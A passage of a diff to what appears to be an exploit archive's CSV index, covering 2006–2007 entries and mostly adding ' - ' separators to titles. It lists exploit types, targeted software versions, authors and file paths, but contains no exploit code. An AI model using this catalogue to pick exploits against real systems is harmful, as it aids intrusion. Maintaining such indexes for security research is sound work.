(WAPPush) Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0 +2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - (WAPPush) Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0 2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0 2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,0 @@ -1871,7 +1871,7 @@ id,file,description,date,author,platform,type,port 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,0 2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion Exploit",2006-08-12,K-159,php,webapps,0 -2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 +2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 2177,platforms/php/webapps/2177.txt,"Joomla Webring Component 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0 2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0 @@ -1937,7 +1937,7 @@ id,file,description,date,author,platform,type,port 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 -2243,platforms/php/webapps/2243.php,"Simple Machines Forum 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 +2243,platforms/php/webapps/2243.php,"Simple Machines Forum 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0 2246,platforms/hardware/dos/2246.cpp,"2Wire Modems/Routers CRLF - Denial of Service",2006-08-22,preth00nker,hardware,dos,0 @@ -1978,7 +1978,7 @@ id,file,description,date,author,platform,type,port 2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - (lpref) Remote File Inclusion Exploit",2006-08-31,Kacper,php,webapps,0 2282,platforms/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,php,webapps,0 2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote BoF Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 -2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 +2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 2285,platforms/php/webapps/2285.txt,"MyBace Light - (login_check.php) Remote File",2006-09-01,"Philipp Niedziela",php,webapps,0 2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.38950 - Long Filename Handling Buffer Overflow Exploit",2006-09-01,bratax,windows,local,0 2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 @@ -2134,7 +2134,7 @@ id,file,description,date,author,platform,type,port 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Include",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow Exploit (Metasploit)",2006-09-27,"H D Moore",windows,remote,0 -2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 +2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0 2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 2444,platforms/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service",2006-09-27,"Tavis Ormandy",multiple,dos,0 @@ -2185,7 +2185,7 @@ id,file,description,date,author,platform,type,port 2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - (config.php) Remote File Inclusion Exploit",2006-10-08,Kacper,php,webapps,0 2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - (moteur.php) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2491,platforms/php/webapps/2491.pl,"phpPC 1.03 RC1 - (/lib/functions.inc.php) Remote File Inclusion Exploit",2006-10-08,ThE-WoLf-KsA,php,webapps,0 -2492,platforms/linux/local/2492.s,"Infecting Elf Binaries to Gain Local Root Exploit",2006-10-08,Sha0,linux,local,0 +2492,platforms/linux/local/2492.s,".ELF Binaries - Gain Local Root Exploit",2006-10-08,Sha0,linux,local,0 2493,platforms/php/webapps/2493.pl,"docmint 2.0 - (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 @@ -2249,7 +2249,7 @@ id,file,description,date,author,platform,type,port 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - (Offline.php) Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Local Root Exploit (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 -2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0 +2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - (settings.php) Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - (extras/mt.php) Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - (forum/track.php) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 @@ -2279,7 +2279,7 @@ id,file,description,date,author,platform,type,port 2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 2584,platforms/php/webapps/2584.pl,"PHPRecipeBook 2.35 - (g_rb_basedir) Remote File Inclusion Exploit",2006-10-17,r0ut3r,php,webapps,0 2585,platforms/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusion",2006-10-17,the_day,php,webapps,0 -2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 CHM Chunk Name Length DoS PoC",2006-10-17,"Damian Put",multiple,dos,0 +2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length DoS PoC",2006-10-17,"Damian Put",multiple,dos,0 2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 2588,platforms/php/webapps/2588.txt,"Easynews 4.4.1 - (admin.php) Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 2589,platforms/php/webapps/2589.txt,"Brim 1.2.1 - (renderer) Multiple Remote File Inclusion",2006-10-17,mdx,php,webapps,0 @@ -2333,7 +2333,7 @@ id,file,description,date,author,platform,type,port 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - constructor Local Root Exploit",2006-10-24,"Marco Ivaldi",solaris,local,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - (index.php) Remote Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 -2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 Topic Reply Command Execution Exploit",2006-10-24,BlackHawk,php,webapps,0 +2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution Exploit",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure Exploit",2006-10-25,rgod,php,webapps,0 2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - (index.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 @@ -2341,7 +2341,7 @@ id,file,description,date,author,platform,type,port 2648,platforms/php/webapps/2648.txt,"CommentIT - (PathToComment) Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow Exploit",2006-10-25,Expanders,windows,remote,25 2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0 -2651,platforms/windows/remote/2651.c,"MiniHttpServer Web Forum & File Sharing Server 4.0 Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 +2651,platforms/windows/remote/2651.c,"MiniHttpServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 2652,platforms/php/webapps/2652.htm,"Php League 0.81 - (config.php) Remote File Inclusion Exploit",2006-10-25,ajann,php,webapps,0 2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - (end.php footfile) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 @@ -2361,12 +2361,12 @@ id,file,description,date,author,platform,type,port 2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - (pcltar.lib.php) Remote File Inclusion Exploit",2006-10-28,ajann,php,webapps,0 2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 -2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit",2006-10-28,FistFuXXer,windows,remote,8028 +2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow Exploit",2006-10-28,FistFuXXer,windows,remote,8028 2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components - (ipnathlp.dll) Remote Denial of Service",2006-10-28,h07,windows,dos,0 2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - (common.php) File Include",2006-10-29,"Mehmet Ince",php,webapps,0 2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - (init_mysource.php) Remote File Inclusion Exploit",2006-10-29,Kacper,php,webapps,0 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - (index.php) SQL Injection",2006-10-29,ajann,php,webapps,0 -2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 +2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 2677,platforms/php/webapps/2677.asp,"Netref 4 - (cat_for_aff.php) Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - (cherche.php) SQL Injection",2006-10-29,ajann,php,webapps,0 @@ -2379,7 +2379,7 @@ id,file,description,date,author,platform,type,port 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Include Exploit",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass SQL Injection",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0 -2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 DHost Remote Buffer Overflow Exploit",2006-10-30,Expanders,windows,remote,0 +2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow Exploit",2006-10-30,Expanders,windows,remote,0 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 @@ -2398,7 +2398,7 @@ id,file,description,date,author,platform,type,port 2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - (FCKeditor) Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0 2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0 -2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 +2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 2710,platforms/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion",2006-11-04,"Mehmet Ince",php,webapps,0 2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Inclusion Exploit",2006-11-04,Kacper,php,webapps,0 2712,platforms/php/webapps/2712.php,"MDPro 1.0.76 - (Cookie: PNSVlang) Local File Inclusion Exploit",2006-11-04,Kacper,php,webapps,0 @@ -2458,8 +2458,8 @@ id,file,description,date,author,platform,type,port 2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - (baseDir) Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0 2768,platforms/php/webapps/2768.txt,"contentnow 1.30 - (local/upload/delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion Exploit",2006-11-13,Kacper,php,webapps,0 -2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver Probe Response SSID Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 -2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 +2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 +2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - (default.asp) Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 @@ -2470,7 +2470,7 @@ id,file,description,date,author,platform,type,port 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - (default.asp) Login ByPass SQL Injection",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (XSS/auth bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 -2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 +2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2783,platforms/windows/dos/2783.html,"WinZIP 10.0.7245 - (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution Exploit",2006-11-14,"Teemu Salmela",multiple,remote,0 2785,platforms/windows/remote/2785.c,"WinZIP 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow Exploit",2006-11-15,prdelka,windows,remote,0 @@ -2632,7 +2632,7 @@ id,file,description,date,author,platform,type,port 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 -2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 +2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion Exploit",2006-12-19,bd0rk,php,webapps,0 2961,platforms/hardware/dos/2961.py,"Hewlett-Packard FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - (down.asp) SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 @@ -2741,7 +2741,7 @@ id,file,description,date,author,platform,type,port 3066,platforms/asp/webapps/3066.txt,"newsCMSlite - (newsCMS.mdb) Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow Exploit (Perl)",2007-01-01,"Jacopo Cervini",windows,remote,25 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 -3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit PoC (ppc)",2007-01-02,MoAB,osx,dos,0 +3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit PoC (PPC)",2007-01-02,MoAB,osx,dos,0 3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation Exploit",2007-01-03,erasmus,windows,local,0 3072,platforms/windows/remote/3072.py,"Apple Quicktime - (rtsp URL Handler) Buffer Overflow Exploit (Windows 2000)",2007-01-03,"Winny Thomas",windows,remote,0 @@ -2752,7 +2752,7 @@ id,file,description,date,author,platform,type,port 3077,platforms/osx/remote/3077.rb,"Apple Quicktime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 3078,platforms/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote DoS",2007-01-04,nitr0us,windows,dos,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 -3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast (XML title) Remote Format String PoC",2007-01-04,MoAB,osx,dos,0 +3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast - (XML title) Remote Format String PoC",2007-01-04,MoAB,osx,dos,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id variable) SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - (eval/SQL Injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 @@ -2773,7 +2773,7 @@ id,file,description,date,author,platform,type,port 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0 3099,platforms/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String Exploit (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Include",2007-01-08,k1tk4t,php,webapps,0 -3101,platforms/multiple/dos/3101.py,"Opera 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 +3101,platforms/multiple/dos/3101.py,"Opera 9.10 - .JPG Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3102,platforms/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Local Privilege Escalation Exploit",2007-01-08,MoAB,osx,local,0 3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 @@ -2784,7 +2784,7 @@ id,file,description,date,author,platform,type,port 3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - wp-trackback.php SQL Injection",2007-01-10,rgod,php,webapps,0 3110,platforms/osx/dos/3110.rb,"Mac OS X 10.4.8 - Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 -3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 +3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0 3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL/XSS) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0 @@ -2830,7 +2830,7 @@ id,file,description,date,author,platform,type,port 3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - (DivXBrowserPlugin npdivx32.dll) IE DoS",2007-01-19,shinnai,windows,dos,0 3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG - Wireless Driver Remote Overflow PoC",2007-01-19,oveRet,windows,remote,0 3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - (.HPJ) Buffer Overflow Exploit",2007-01-19,porkythepig,windows,local,0 -3160,platforms/osx/dos/3160.html,"Transmit.app 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC",2007-01-20,MoAB,osx,dos,0 +3160,platforms/osx/dos/3160.html,"Transmit.app 3.5.5 - ftps:// URL Handler Heap Buffer Overflow PoC",2007-01-20,MoAB,osx,dos,0 3161,platforms/php/webapps/3161.txt,"PhpSherpa - (include/config.inc.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - (include/includes.php) Remote Inclusion",2007-01-20,GoLd_M,php,webapps,0 3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - (nl.php g_strRootDir) Remote Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 @@ -2961,7 +2961,7 @@ id,file,description,date,author,platform,type,port 3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 -3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 +3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 - in.telnetd Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Remote Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 3295,platforms/asp/webapps/3295.txt,"Philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow Exploit",2007-02-12,defsec,windows,remote,0 @@ -2970,7 +2970,7 @@ id,file,description,date,author,platform,type,port 3299,platforms/php/webapps/3299.pl,"phpCC 4.2 beta - (nickpage.php npid) SQL Injection",2007-02-13,ajann,php,webapps,0 3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 -3302,platforms/windows/remote/3302.sh,"Lotus Domino R6 Webmail Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 +3302,platforms/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM / 4.1-SUSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 3304,platforms/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,windows,dos,0 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,php,webapps,0 @@ -3025,11 +3025,11 @@ id,file,description,date,author,platform,type,port 3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Remote Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation Exploit",2007-02-21,"Jon Hart",linux,local,0 3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0 -3358,platforms/multiple/remote/3358.pl,"Oracle 10g 